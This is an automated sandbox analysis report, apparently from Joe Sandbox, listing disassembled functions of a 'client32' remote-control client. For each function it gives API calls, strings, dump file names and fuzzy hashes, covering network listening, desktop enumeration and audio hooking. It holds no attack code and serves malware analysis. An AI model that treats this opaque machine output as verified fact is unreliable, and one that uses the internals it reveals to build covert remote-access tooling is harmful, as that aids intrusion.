Part of subcall function 11064880: _strtok.LIBCMT ref: 110648C0
Part of subcall function 11064880: _strtok.LIBCMT ref: 110648F0

GetDC.USER32(00000000), ref: 11065558
GetDeviceCaps.GDI32(00000000,0000000E), ref: 11065563
GetDeviceCaps.GDI32(00000000,0000000C), ref: 1106556E
ReleaseDC.USER32(00000000,00000000), ref: 110655B9

Strings

View, xrefs: 1106550A
Cachesize, xrefs: 11065505
Codepage, xrefs: 11065530
932, 949, 1361, 874, 862, xrefs: 1106552B
DBCS, xrefs: 11065535

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CapsDevice_strtok$Release__wcstoi64
String ID: 932, 949, 1361, 874, 862$Cachesize$Codepage$DBCS$View
API String ID: 3945178471-2526036698
Opcode ID: be64c8f11d315dafd5fcf728b19d215ad6edf1e455b8b0736fd2626b359808b8
Instruction ID: 682317bc02e2a30c69588dc0a9c96f0ce4cbb9861371b6ad8b8e837dbdf19ace
Opcode Fuzzy Hash: be64c8f11d315dafd5fcf728b19d215ad6edf1e455b8b0736fd2626b359808b8
Instruction Fuzzy Hash: DA21497AE002246BE3149F75CDC4BA9FB98FB08354F014565F969EB280D775A940C7D0

Function 1101F2A0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 70windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32 ref: 1101F2B5
_memset.LIBCMT ref: 1101F2D8
GetMenuItemInfoA.USER32 ref: 1101F2F6
_free.LIBCMT ref: 1101F305

Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000), ref: 11163ABB
Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD

_free.LIBCMT ref: 1101F30E
DeleteObject.GDI32(00000000), ref: 1101F32D
DeleteObject.GDI32(00000000), ref: 1101F33B

Strings

UndoOwnerDraw, xrefs: 1101F2A7
0, xrefs: 1101F2E8
, xrefs: 1101F2EF

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: DeleteItemMenuObject_free$CountErrorFreeHeapInfoLast_memset
String ID: $0$UndoOwnerDraw
API String ID: 4094458939-790594647
Opcode ID: 6ed4e77d9c016c8eff6e2e5212ae31cf16a08a19f327eae3f04c88df89f206e5
Instruction ID: 9f4c9540ed3e85911a06978235dbefa5e19a2329fc37d196683f21109e2371eb
Opcode Fuzzy Hash: 6ed4e77d9c016c8eff6e2e5212ae31cf16a08a19f327eae3f04c88df89f206e5
Instruction Fuzzy Hash: 16119671E162299BDB04DFE49C85B9DFBECBB18318F000069E814D7244E674A5108B91

Function 1106F400 Relevance: 16.8, APIs: 3, Strings: 8, Instructions: 297COMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 1106F737
EnterCriticalSection.KERNEL32(?,?,?,?,?,?), ref: 1106F788
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?), ref: 1106F7A8

Strings

TCPIP, xrefs: 1106F56A, 1106F697, 1106F6F8, 1106F715
ListenPort, xrefs: 1106F710
NameResp from %s(%s), len=%d/%d, flags=%d, channel=%s, xrefs: 1106F5A0
tracerecv, xrefs: 1106F565
UseNCS, xrefs: 1106F692
%s:%d, xrefs: 1106F731
(null), xrefs: 1106F57E, 1106F590
Port, xrefs: 1106F6F3

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeavewsprintf
String ID: %s:%d$(null)$ListenPort$NameResp from %s(%s), len=%d/%d, flags=%d, channel=%s$Port$TCPIP$UseNCS$tracerecv
API String ID: 3005300677-3496508882
Opcode ID: 2001d87728a614cb12b208929ef54efa7c413359fb74f95ac4bf7d33211d9503
Instruction ID: f86a0a3523b45ae2aa4ac8696085f91b0c00e2f9513f1a57450127c273c63767
Opcode Fuzzy Hash: 2001d87728a614cb12b208929ef54efa7c413359fb74f95ac4bf7d33211d9503
Instruction Fuzzy Hash: 17B19F79E003169FDB10CF64CC90FAAB7B9AF89708F50419DE909A7241EB75AD41CF62

Function 11041440 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 211windowtimeCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 1104147B

Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D

SendMessageTimeoutA.USER32(?,0000004A,0001033C,?,00000002,00002710,?), ref: 11041670
_free.LIBCMT ref: 11041677

Strings

DisableJournalMenu, xrefs: 1104149C
Client, xrefs: 110414A1
IsA(), xrefs: 110415D7, 11041603, 1104163E
SendJournalStatustoSTUI(%d, %d, %d, %d), xrefs: 110415AE
Journal status( bNoMenu = %d, gpJournal = %x, %d, %d) bVistaUI %d, xrefs: 110414E9
e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h, xrefs: 110415D2, 110415FE, 11041639

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MessageSendTimeoutWindow__wcstoi64_free
String ID: Client$DisableJournalMenu$IsA()$Journal status( bNoMenu = %d, gpJournal = %x, %d, %d) bVistaUI %d$SendJournalStatustoSTUI(%d, %d, %d, %d)$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
API String ID: 1897251511-2352888828
Opcode ID: 9b5c5f8263bc46f50a6a13551c4df91eab1ce19a36df145c4fc7c0f47d5eefed
Instruction ID: 7d7d201ace8770d3ab851aba43ef7aa7a0e05de8b0dcb1a0fb6fb2d6540d47c3
Opcode Fuzzy Hash: 9b5c5f8263bc46f50a6a13551c4df91eab1ce19a36df145c4fc7c0f47d5eefed
Instruction Fuzzy Hash: 37717DB5F0021AAFDB04DFD4CCC0AEEF7B5AF48304F244279E516A7685E631A905CBA1

Function 11041830 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 197windowtimeCOMMON

Download Yara Rule

APIs

OpenDesktopA.USER32 ref: 110418C9
EnumDesktopWindows.USER32(00000000,Function_000416A0,?), ref: 110418E7
CloseDesktop.USER32 ref: 110418EE
_malloc.LIBCMT ref: 11041975
_memmove.LIBCMT ref: 11041992
SendMessageTimeoutA.USER32(?,0000004A,0001033C,00000687,00000002,00002710,?), ref: 110419CE
GetLastError.KERNEL32 ref: 110419D4
_free.LIBCMT ref: 110419DB

Strings

Default, xrefs: 110418C4

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Desktop$CloseEnumErrorLastMessageOpenSendTimeoutWindows_free_malloc_memmove
String ID: Default
API String ID: 3929658058-753088835
Opcode ID: dc0d0677379a3a6607a7d8ec950fd38cdef1e8a4373d75255f46cdd4fd172378
Instruction ID: 0a4c041bdd0654e93387037eab9a5714a5cdb1d116a6a5b81f645acbf217ae6d
Opcode Fuzzy Hash: dc0d0677379a3a6607a7d8ec950fd38cdef1e8a4373d75255f46cdd4fd172378
Instruction Fuzzy Hash: CD716F79E0021A9FDB04DFE4C8809EEF7B9FF48304F108169E516A7244EB74BA45CB94

Function 11051360 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 167COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 110513F9
CloseHandle.KERNEL32(?), ref: 110514DB

Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D

Strings

Client, xrefs: 110513CF, 11051496, 110514B2
_profileSection, xrefs: 110513CA
UserAcknowledge, xrefs: 11051491, 110514AD
PolicyChanged, userack needed, disconnect, xrefs: 110514C0
PolicyChanged, invalid user, disconnect, xrefs: 1105147C
10.21.0.0, xrefs: 11051396
PolicyChanged, disconnect, xrefs: 11051532

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseHandle__wcstoi64_memset
String ID: 10.21.0.0$Client$PolicyChanged, disconnect$PolicyChanged, invalid user, disconnect$PolicyChanged, userack needed, disconnect$UserAcknowledge$_profileSection
API String ID: 510078033-311296318
Opcode ID: 7d093bfb685be269e84acd2b1f5ae9afafa6df4d05251a5354ee2fe60ae5ef6d
Instruction ID: d6821365ce57f0d8f52ec6341a9adbf8752ca4ec49bea4256a0f2cceaf2f1fbd
Opcode Fuzzy Hash: 7d093bfb685be269e84acd2b1f5ae9afafa6df4d05251a5354ee2fe60ae5ef6d
Instruction Fuzzy Hash: D0513E75F4034AAFEB50CA61DC41FDAB7ACAB05708F144164FD05AB2C1EB71B604CB51

Function 1100B870 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 149COMMON

Download Yara Rule

APIs

GetOverlappedResult.KERNEL32(?,B244779C,FFFFFFFF,00000001), ref: 1100B8BC
GetLastError.KERNEL32 ref: 1100B8C6
GetTickCount.KERNEL32 ref: 1100B929
wsprintfA.USER32 ref: 1100B966
ResetEvent.KERNEL32(?), ref: 1100BA1F

Strings

Hook_channels, xrefs: 1100B9BB
New hooked channels,bitspersample=%d,%d (old %d,%d), xrefs: 1100B9A4, 1100BA07
Hook_bits_per_sample, xrefs: 1100B9DB
Audio, xrefs: 1100B9C0, 1100B9E0

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountErrorEventLastOverlappedResetResultTickwsprintf
String ID: Audio$Hook_bits_per_sample$Hook_channels$New hooked channels,bitspersample=%d,%d (old %d,%d)
API String ID: 3598861413-432254317
Opcode ID: 4c10284e92fc8c445f1fd1c423e0f9c9f7608b397fd9e9c7a1b4b8b2183270a2
Instruction ID: 18c60078330076d4e9d4cf7e90cd241f5a56869eb84b7316cdfab9231a576d1f
Opcode Fuzzy Hash: 4c10284e92fc8c445f1fd1c423e0f9c9f7608b397fd9e9c7a1b4b8b2183270a2
Instruction Fuzzy Hash: 7351D1B8900A1AABE710CFA5CC84ABBF7F8EF49709F004519F56697281E7747980C7B5

Function 11029520 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 131COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 1102965A
GetTickCount.KERNEL32 ref: 1102968A
GetTickCount.KERNEL32(Client,DisableStandby,00000000,00000000,0034FEA8,000000D0,B24479DC), ref: 110296C8

Strings

_debug, xrefs: 110296B1
Client, xrefs: 1102959F
Stop resuming, xrefs: 11029617
APMSUSPEND, suspended=%u, suspending=%u, resuming=%u, xrefs: 11029600
IgnorePowerResume, xrefs: 110296AC
DisableStandby, xrefs: 1102959A

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountTick
String ID: APMSUSPEND, suspended=%u, suspending=%u, resuming=%u$Client$DisableStandby$IgnorePowerResume$Stop resuming$_debug
API String ID: 536389180-1339850372
Opcode ID: cff2d232eac92707a3dc7571f277a3aae506fbc6ee655e5cff877dc377916b45
Instruction ID: 7a2480a0f38ec62df9d6165c4879ba51ca1346fdc5c877313ede350298642e4b
Opcode Fuzzy Hash: cff2d232eac92707a3dc7571f277a3aae506fbc6ee655e5cff877dc377916b45
Instruction Fuzzy Hash: 8541CD75E022359BE712CFE1D981BA9F7E4FB44348F10056AE83597284FB30E680CBA1

Function 110DD6D0 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 122COMMON

Download Yara Rule

APIs

OutputDebugStringA.KERNEL32(NsAppSystem Info : Unexpected data from NsStudentApp...), ref: 110DD77D
std::exception::exception.LIBCMT ref: 110DD7B8
__CxxThrowException@8.LIBCMT ref: 110DD7D3
OutputDebugStringA.KERNEL32(NsAppSystem Info : Control Channel Closed by 0 bytes RECV...), ref: 110DD841
OutputDebugStringA.KERNEL32(NsAppSystem Info : CONTROL CHANNEL Data Recv ********* THREAD TERMINATING *********), ref: 110DD875

Part of subcall function 110D7F00: __CxxThrowException@8.LIBCMT ref: 110D7F6A
Part of subcall function 110D7F00: #16.WSOCK32(?,?,?,00000000,00001000,B24479DC,?,00000000,00000001), ref: 110D7F8C

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

Strings

NsAppSystem Info : Unexpected data from NsStudentApp..., xrefs: 110DD775
NsAppSystem Info : CONTROL CHANNEL Data Recv ********* THREAD TERMINATING *********, xrefs: 110DD870
NsAppSystem Info : Control Channel Waiting For Data..., xrefs: 110DD703
NsAppSystem Info : Control Channel Closed by 0 bytes RECV..., xrefs: 110DD83C

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: DebugOutputString$Exception@8Throw$_malloc_memsetstd::exception::exceptionwsprintf
String ID: NsAppSystem Info : CONTROL CHANNEL Data Recv ********* THREAD TERMINATING *********$NsAppSystem Info : Control Channel Closed by 0 bytes RECV...$NsAppSystem Info : Control Channel Waiting For Data...$NsAppSystem Info : Unexpected data from NsStudentApp...
API String ID: 477284662-4139260718
Opcode ID: 818d22774c2ef30dc6ad1cd165df33f034c57c670839690e111d63b4e8da9283
Instruction ID: 0fb2eb5c845aae8e11df8756a30c5633d39706f88fe6ba16aa3ac9f9913de48b
Opcode Fuzzy Hash: 818d22774c2ef30dc6ad1cd165df33f034c57c670839690e111d63b4e8da9283
Instruction Fuzzy Hash: 85414B78E002589FCB15CFA4C990FAEFBB4FF19708F548199E41AA7241DB35A904CFA1

Function 1103D2B0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 113filewindowCOMMON

Download Yara Rule

APIs

FindWindowA.USER32 ref: 1103D2E4
SendMessageA.USER32(00000000,0000004A,0001033C,?), ref: 1103D313
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1103D353
CloseHandle.KERNEL32(?), ref: 1103D364

Strings

CLTCONN.CPP, xrefs: 1103D3BF
NSMW16Class, xrefs: 1103D2DF

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CloseFileFindHandleMessageSendWindowWrite
String ID: CLTCONN.CPP$NSMW16Class
API String ID: 4104200039-3790257117
Opcode ID: 2f3160cb8d4d3e9d4d4fb5de1e8df60238232f5b231a300af43937cf6ba75c4c
Instruction ID: 7413f3f2c5586e26beac36a23cabaf74cb1d99cfb277255675335e3274ed5d18
Opcode Fuzzy Hash: 2f3160cb8d4d3e9d4d4fb5de1e8df60238232f5b231a300af43937cf6ba75c4c
Instruction Fuzzy Hash: AC418E75A0020AAFE715CFA0D884BDEF7ACBB84719F008659F85997240DB74BA54CB91

Function 1113F0E0 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 111windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003), ref: 1113F116
MessageBeep.USER32(00000000,?,?,?,00000000,00000000), ref: 1113F1C9
InvalidateRect.USER32(?,00000000,00000001), ref: 1113F1F4
UpdateWindow.USER32 ref: 1113F21B

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

NSMStatsWindow Read %d and %d (previous %d), xrefs: 1113F153
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1113F0F4, 1113F1DA, 1113F205
NSMStatsWindow::OnTimer, xrefs: 1113F11C
m_hWnd, xrefs: 1113F0F9, 1113F1DF, 1113F20A
NSMStatsWindow Add value %d, xrefs: 1113F199

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
